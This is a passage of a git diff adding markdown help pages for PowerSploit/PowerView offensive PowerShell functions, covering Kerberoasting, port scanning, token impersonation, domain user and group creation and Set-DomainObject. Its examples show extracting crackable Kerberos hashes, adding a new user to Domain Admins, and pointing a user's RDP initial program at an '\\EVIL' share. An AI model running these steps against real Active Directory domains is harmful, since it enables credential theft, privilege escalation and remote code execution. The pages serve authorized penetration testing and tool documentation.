@@ -0,0 +1,233 @@ +# Invoke-Kerberoast + +## SYNOPSIS +Requests service tickets for kerberoast-able accounts and returns extracted ticket hashes. + +Author: Will Schroeder (@harmj0y), @machosec +License: BSD 3-Clause +Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, Get-DomainUser, Get-DomainSPNTicket + +## SYNTAX + +``` +Invoke-Kerberoast [[-Identity] ] [-Domain ] [-LDAPFilter ] [-SearchBase ] + [-Server ] [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] + [-OutputFormat ] [-Credential ] +``` + +## DESCRIPTION +Uses Get-DomainUser to query for user accounts with non-null service principle +names (SPNs) and uses Get-SPNTicket to request/extract the crackable ticket information. +The ticket format can be specified with -OutputFormat \. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Invoke-Kerberoast | fl +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Invoke-Kerberoast -Domain dev.testlab.local | fl +``` + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -orce +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLB\dfm.a', $SecPassword) +Invoke-Kerberoast -Credential $Cred -Verbose | fl + +## PARAMETERS + +### -Identity +A SamAccountName (e.g. +harmj0y), DistinguishedName (e.g. +CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. 
+Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -OutputFormat +Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format. +Defaults to 'John'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Format + +Required: False +Position: Named +Default value: John +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.SPNTicket + +Outputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Invoke-Portscan.md b/docs/Recon/Invoke-Portscan.md new file mode 100755 index 0000000..49d9e32 --- /dev/null +++ b/docs/Recon/Invoke-Portscan.md 
@@ -0,0 +1,430 @@ +# Invoke-Portscan + +## SYNOPSIS +Simple portscan module + +PowerSploit Function: Invoke-Portscan +Author: Rich Lundeen (http://webstersProdigy.net) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +### cmdHosts +``` +Invoke-Portscan -Hosts [-ExcludeHosts ] [-Ports ] [-PortFile ] + [-TopPorts ] [-ExcludedPorts ] [-SkipDiscovery] [-PingOnly] [-DiscoveryPorts ] + [-Threads ] [-nHosts ] [-Timeout ] [-SleepTimer ] [-SyncFreq ] [-T ] + [-GrepOut ] [-XmlOut ] [-ReadableOut ] [-AllformatsOut ] [-noProgressMeter] + [-quiet] [-ForceOverwrite] +``` + +### fHosts +``` +Invoke-Portscan -HostFile [-ExcludeHosts ] [-Ports ] [-PortFile ] + [-TopPorts ] [-ExcludedPorts ] [-SkipDiscovery] [-PingOnly] [-DiscoveryPorts ] + [-Threads ] [-nHosts ] [-Timeout ] [-SleepTimer ] [-SyncFreq ] [-T ] + [-GrepOut ] [-XmlOut ] [-ReadableOut ] [-AllformatsOut ] [-noProgressMeter] + [-quiet] [-ForceOverwrite] +``` + +## DESCRIPTION +Does a simple port scan using regular sockets, based (pretty) loosely on nmap + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Invoke-Portscan -Hosts "webstersprodigy.net,google.com,microsoft.com" -TopPorts 50 +``` + +Description +----------- +Scans the top 50 ports for hosts found for webstersprodigy.net,google.com, and microsoft.com + +### -------------------------- EXAMPLE 2 -------------------------- +``` +echo webstersprodigy.net | Invoke-Portscan -oG test.gnmap -f -ports "80,443,8080" +``` + +Description +----------- +Does a portscan of "webstersprodigy.net", and writes a greppable output file + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Invoke-Portscan -Hosts 192.168.1.1/24 -T 4 -TopPorts 25 -oA localnet +``` + +Description +----------- +Scans the top 20 ports for hosts found in the 192.168.1.1/24 range, outputs all file formats + +## PARAMETERS + +### -Hosts +Include these comma seperated hosts (supports IPv4 CIDR 
notation) or pipe them in + +```yaml +Type: String[] +Parameter Sets: cmdHosts +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -HostFile +Input hosts from file rather than commandline + +```yaml +Type: String +Parameter Sets: fHosts +Aliases: iL + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ExcludeHosts +Exclude these comma seperated hosts + +```yaml +Type: String +Parameter Sets: (All) +Aliases: exclude + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Ports +Include these comma seperated ports (can also be a range like 80-90) + +```yaml +Type: String +Parameter Sets: (All) +Aliases: p + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -PortFile +Input ports from a file + +```yaml +Type: String +Parameter Sets: (All) +Aliases: iP + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -TopPorts +Include the x top ports - only goes to 1000, default is top 50 + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ExcludedPorts +Exclude these comma seperated ports + +```yaml +Type: String +Parameter Sets: (All) +Aliases: xPorts + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SkipDiscovery +Treat all hosts as online, skip host discovery + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: Pn + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard 
characters: False +``` + +### -PingOnly +Ping scan only (disable port scan) + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: sn + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -DiscoveryPorts +Comma separated ports used for host discovery. +-1 is a ping + +```yaml +Type: String +Parameter Sets: (All) +Aliases: PS + +Required: False +Position: Named +Default value: -1,445,80,443 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Threads +number of max threads for the thread pool (per host) + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 100 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -nHosts +number of hosts to concurrently scan + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 25 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Timeout +Timeout time on a connection in miliseconds before port is declared filtered + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 2000 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SleepTimer +Wait before thread checking, in miliseconds + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 500 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SyncFreq +How often (in terms of hosts) to sync threads and flush output + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 1024 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -T +\[0-5\] shortcut performance options. +Default is 3. +higher is more aggressive. 
+Sets (nhosts, threads,timeout) + 5 {$nHosts=30; $Threads = 1000; $Timeout = 750 } + 4 {$nHosts=25; $Threads = 1000; $Timeout = 1200 } + 3 {$nHosts=20; $Threads = 100; $Timeout = 2500 } + 2 {$nHosts=15; $Threads = 32; $Timeout = 3000 } + 1 {$nHosts=10; $Threads = 32; $Timeout = 5000 } + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -GrepOut +Greppable output file + +```yaml +Type: String +Parameter Sets: (All) +Aliases: oG + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -XmlOut +output XML file + +```yaml +Type: String +Parameter Sets: (All) +Aliases: oX + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ReadableOut +output file in 'readable' format + +```yaml +Type: String +Parameter Sets: (All) +Aliases: oN + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -AllformatsOut +output in readable (.nmap), xml (.xml), and greppable (.gnmap) formats + +```yaml +Type: String +Parameter Sets: (All) +Aliases: oA + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -noProgressMeter +Suppresses the progress meter + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -quiet +supresses returned output and don't store hosts in memory - useful for very large scans + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: q + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### 
-ForceOverwrite +Force Overwrite if output Files exist. +Otherwise it throws exception + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: F + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[http://webstersprodigy.net](http://webstersprodigy.net) + diff --git a/docs/Recon/Invoke-ReverseDnsLookup.md b/docs/Recon/Invoke-ReverseDnsLookup.md new file mode 100755 index 0000000..348ad91 --- /dev/null +++ b/docs/Recon/Invoke-ReverseDnsLookup.md 
@@ -0,0 +1,106 @@ +# Invoke-ReverseDnsLookup + +## SYNOPSIS +Perform a reverse DNS lookup scan on a range of IP addresses. + +PowerSploit Function: Invoke-ReverseDnsLookup +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +``` +Invoke-ReverseDnsLookup [-IpRange] +``` + +## DESCRIPTION +Invoke-ReverseDnsLookup scans an IP address range for DNS PTR records. +This script is useful for performing DNS reconnaisance prior to conducting an authorized penetration test. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Invoke-ReverseDnsLookup 74.125.228.0/29 +``` + +IP HostName +-- -------- +74.125.228.1 iad23s05-in-f1.1e100.net +74.125.228.2 iad23s05-in-f2.1e100.net +74.125.228.3 iad23s05-in-f3.1e100.net +74.125.228.4 iad23s05-in-f4.1e100.net +74.125.228.5 iad23s05-in-f5.1e100.net +74.125.228.6 iad23s05-in-f6.1e100.net + +Description +----------- +Returns the hostnames of the IP addresses specified by the CIDR range. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Invoke-ReverseDnsLookup '74.125.228.1,74.125.228.4-74.125.228.6' +``` + +IP HostName +-- -------- +74.125.228.1 iad23s05-in-f1.1e100.net +74.125.228.4 iad23s05-in-f4.1e100.net +74.125.228.5 iad23s05-in-f5.1e100.net +74.125.228.6 iad23s05-in-f6.1e100.net + +Description +----------- +Returns the hostnames of the IP addresses specified by the IP range specified. 
+ +### -------------------------- EXAMPLE 3 -------------------------- +``` +Write-Output "74.125.228.1,74.125.228.0/29" | Invoke-ReverseDnsLookup +``` + +IP HostName +-- -------- +74.125.228.1 iad23s05-in-f1.1e100.net +74.125.228.1 iad23s05-in-f1.1e100.net +74.125.228.2 iad23s05-in-f2.1e100.net +74.125.228.3 iad23s05-in-f3.1e100.net +74.125.228.4 iad23s05-in-f4.1e100.net +74.125.228.5 iad23s05-in-f5.1e100.net +74.125.228.6 iad23s05-in-f6.1e100.net + +Description +----------- +Returns the hostnames of the IP addresses piped from another source. + +## PARAMETERS + +### -IpRange +Specifies the IP address range. +The range provided can be in the form of a single IP address, a low-high range, or a CIDR range. +Comma-delimited ranges may can be provided. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[http://www.exploit-monday.com +https://github.com/mattifestation/PowerSploit]() + diff --git a/docs/Recon/Invoke-RevertToSelf.md b/docs/Recon/Invoke-RevertToSelf.md new file mode 100755 index 0000000..4e978ac --- /dev/null +++ b/docs/Recon/Invoke-RevertToSelf.md 
@@ -0,0 +1,56 @@ +# Invoke-RevertToSelf + +## SYNOPSIS +Reverts any token impersonation. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect + +## SYNTAX + +``` +Invoke-RevertToSelf [[-TokenHandle] ] +``` + +## DESCRIPTION +This function uses RevertToSelf() to revert any impersonated tokens. +If -TokenHandle is passed (the token handle returned by Invoke-UserImpersonation), +CloseHandle() is used to close the opened handle. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$Token = Invoke-UserImpersonation -Credential $Cred +Invoke-RevertToSelf -TokenHandle $Token + +## PARAMETERS + +### -TokenHandle +An optional IntPtr TokenHandle returned by Invoke-UserImpersonation. + +```yaml +Type: IntPtr +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Invoke-UserImpersonation.md b/docs/Recon/Invoke-UserImpersonation.md new file mode 100755 index 0000000..6b1afc4 --- /dev/null +++ b/docs/Recon/Invoke-UserImpersonation.md 
@@ -0,0 +1,100 @@ +# Invoke-UserImpersonation + +## SYNOPSIS +Creates a new "runas /netonly" type logon and impersonates the token. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect + +## SYNTAX + +### Credential (Default) +``` +Invoke-UserImpersonation -Credential [-Quiet] +``` + +### TokenHandle +``` +Invoke-UserImpersonation -TokenHandle [-Quiet] +``` + +## DESCRIPTION +This function uses LogonUser() with the LOGON32_LOGON_NEW_CREDENTIALS LogonType +to simulate "runas /netonly". +The resulting token is then impersonated with +ImpersonateLoggedOnUser() and the token handle is returned for later usage +with Invoke-RevertToSelf. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Invoke-UserImpersonation -Credential $Cred + +## PARAMETERS + +### -Credential +A \[Management.Automation.PSCredential\] object with alternate credentials +to impersonate in the current thread space. + +```yaml +Type: PSCredential +Parameter Sets: Credential +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -TokenHandle +An IntPtr TokenHandle returned by a previous Invoke-UserImpersonation. +If this is supplied, LogonUser() is skipped and only ImpersonateLoggedOnUser() +is executed. + +```yaml +Type: IntPtr +Parameter Sets: TokenHandle +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Quiet +Suppress any warnings about STA vs MTA. 
+ +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### IntPtr + +The TokenHandle result from LogonUser. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/New-DomainGroup.md b/docs/Recon/New-DomainGroup.md new file mode 100755 index 0000000..fc5cac0 --- /dev/null +++ b/docs/Recon/New-DomainGroup.md 
@@ -0,0 +1,150 @@ +# New-DomainGroup + +## SYNOPSIS +Creates a new domain group (assuming appropriate permissions) and returns the group object. + +TODO: implement all properties that New-ADGroup implements (https://technet.microsoft.com/en-us/library/ee617253.aspx). + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-PrincipalContext + +## SYNTAX + +``` +New-DomainGroup [-SamAccountName] [[-Name] ] [[-DisplayName] ] + [[-Description] ] [[-Domain] ] [[-Credential] ] +``` + +## DESCRIPTION +First binds to the specified domain context using Get-PrincipalContext. +The bound domain context is then used to create a new +DirectoryServices.AccountManagement.GroupPrincipal with the specified +group properties. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +New-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.' +``` + +Creates the 'TestGroup' group with the specified description. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +New-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.' -Credential $Cred + +Creates the 'TestGroup' group with the specified description using the specified alternate credentials. + +## PARAMETERS + +### -SamAccountName +Specifies the Security Account Manager (SAM) account name of the group to create. +Maximum of 256 characters. +Mandatory. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Name +Specifies the name of the group to create. +If not provided, defaults to SamAccountName. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -DisplayName +Specifies the display name of the group to create. +If not provided, defaults to SamAccountName. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 3 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Description +Specifies the description of the group to create. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 4 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use to search for user/group principals, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 5 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 6 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### DirectoryServices.AccountManagement.GroupPrincipal + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/New-DomainUser.md b/docs/Recon/New-DomainUser.md new file mode 100755 index 0000000..80f4fcf --- /dev/null +++ b/docs/Recon/New-DomainUser.md 
@@ -0,0 +1,184 @@ +# New-DomainUser + +## SYNOPSIS +Creates a new domain user (assuming appropriate permissions) and returns the user object. + +TODO: implement all properties that New-ADUser implements (https://technet.microsoft.com/en-us/library/ee617253.aspx). + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-PrincipalContext + +## SYNTAX + +``` +New-DomainUser [-SamAccountName] [-AccountPassword] [[-Name] ] + [[-DisplayName] ] [[-Description] ] [[-Domain] ] [[-Credential] ] +``` + +## DESCRIPTION +First binds to the specified domain context using Get-PrincipalContext. +The bound domain context is then used to create a new +DirectoryServices.AccountManagement.UserPrincipal with the specified user properties. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword + +Creates the 'harmj0y2' user with the specified description and password. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$user = New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword -Credential $Cred + +Creates the 'harmj0y2' user with the specified description and password, using the specified +alternate credentials. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$UserPassword = ConvertTo-SecureString 'Password123!' 
-AsPlainText -Force +New-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred + +Creates the 'andy' user with the specified description and password, using the specified +alternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember +and the alternate credentials. + +## PARAMETERS + +### -SamAccountName +Specifies the Security Account Manager (SAM) account name of the user to create. +Maximum of 256 characters. +Mandatory. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -AccountPassword +Specifies the password for the created user. +Mandatory. + +```yaml +Type: SecureString +Parameter Sets: (All) +Aliases: Password + +Required: True +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Name +Specifies the name of the user to create. +If not provided, defaults to SamAccountName. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 3 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -DisplayName +Specifies the display name of the user to create. +If not provided, defaults to SamAccountName. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 4 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Description +Specifies the description of the user to create. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 5 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use to search for user/group principals, defaults to the current domain. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 6 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 7 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### DirectoryServices.AccountManagement.UserPrincipal + +## NOTES + +## RELATED LINKS + +[http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/](http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/) + diff --git a/docs/Recon/Remove-RemoteConnection.md b/docs/Recon/Remove-RemoteConnection.md new file mode 100755 index 0000000..fe6f3b3 --- /dev/null +++ b/docs/Recon/Remove-RemoteConnection.md 
@@ -0,0 +1,84 @@ +# Remove-RemoteConnection + +## SYNOPSIS +Destroys a connection created by New-RemoteConnection. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect + +## SYNTAX + +### ComputerName (Default) +``` +Remove-RemoteConnection [-ComputerName] +``` + +### Path +``` +Remove-RemoteConnection [-Path] +``` + +## DESCRIPTION +This function uses WNetCancelConnection2 to destroy a connection created by +New-RemoteConnection. +If a -Path isn't specified, a -ComputerName is required to +'unmount' \\\\$ComputerName\IPC$. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Remove-RemoteConnection -ComputerName 'PRIMARY.testlab.local' +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Remove-RemoteConnection -Path '\\PRIMARY.testlab.local\C$\' +``` + +### -------------------------- EXAMPLE 3 -------------------------- +``` +@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Remove-RemoteConnection +``` + +## PARAMETERS + +### -ComputerName +Specifies the system to remove a \\\\ComputerName\IPC$ connection for. + +```yaml +Type: String[] +Parameter Sets: ComputerName +Aliases: HostName, dnshostname, name + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Path +Specifies the remote \\\\UNC\path to remove the connection for. + +```yaml +Type: String[] +Parameter Sets: Path +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Resolve-IPAddress.md b/docs/Recon/Resolve-IPAddress.md new file mode 100755 index 0000000..744c764 --- /dev/null +++ b/docs/Recon/Resolve-IPAddress.md 
@@ -0,0 +1,66 @@ +# Resolve-IPAddress + +## SYNOPSIS +Resolves a given hostename to its associated IPv4 address. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Resolve-IPAddress [[-ComputerName] ] +``` + +## DESCRIPTION +Resolves a given hostename to its associated IPv4 address using +\[Net.Dns\]::GetHostEntry(). +If no hostname is provided, the default +is the IP address of the localhost. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Resolve-IPAddress -ComputerName SERVER +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +@("SERVER1", "SERVER2") | Resolve-IPAddress +``` + +## PARAMETERS + +### -ComputerName +{{Fill ComputerName Description}} + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: $Env:COMPUTERNAME +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +### String + +Accepts one or more IP address strings on the pipeline. + +## OUTPUTS + +### System.Management.Automation.PSCustomObject + +A custom PSObject with the ComputerName and IPAddress. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Set-DomainObject.md b/docs/Recon/Set-DomainObject.md new file mode 100755 index 0000000..482d86d --- /dev/null +++ b/docs/Recon/Set-DomainObject.md 
@@ -0,0 +1,346 @@ +# Set-DomainObject + +## SYNOPSIS +Modifies a gven property for a specified active directory object. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject + +## SYNTAX + +``` +Set-DomainObject [[-Identity] ] [-Set ] [-XOR ] [-Clear ] + [-Domain ] [-LDAPFilter ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] + [-Credential ] +``` + +## DESCRIPTION +Splats user/object targeting parameters to Get-DomainObject, returning the raw +searchresult object. +Retrieves the raw directoryentry for the object, and sets +any values from -Set @{}, XORs any values from -XOR @{}, and clears any values +from -Clear @(). + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose +``` + +VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser))) +VERBOSE: Setting mstsinitialprogram to \\\\EVIL\program.exe for object testuser + +### -------------------------- EXAMPLE 2 -------------------------- +``` +"S-1-5-21-890171859-3433809279-3366196753-1108","testuser" | Set-DomainObject -Set @{'countrycode'=1234; 'mstsinitialprogram'='\\EVIL\program2.exe'} -Verbose +``` + +VERBOSE: Get-DomainSearcher search string: 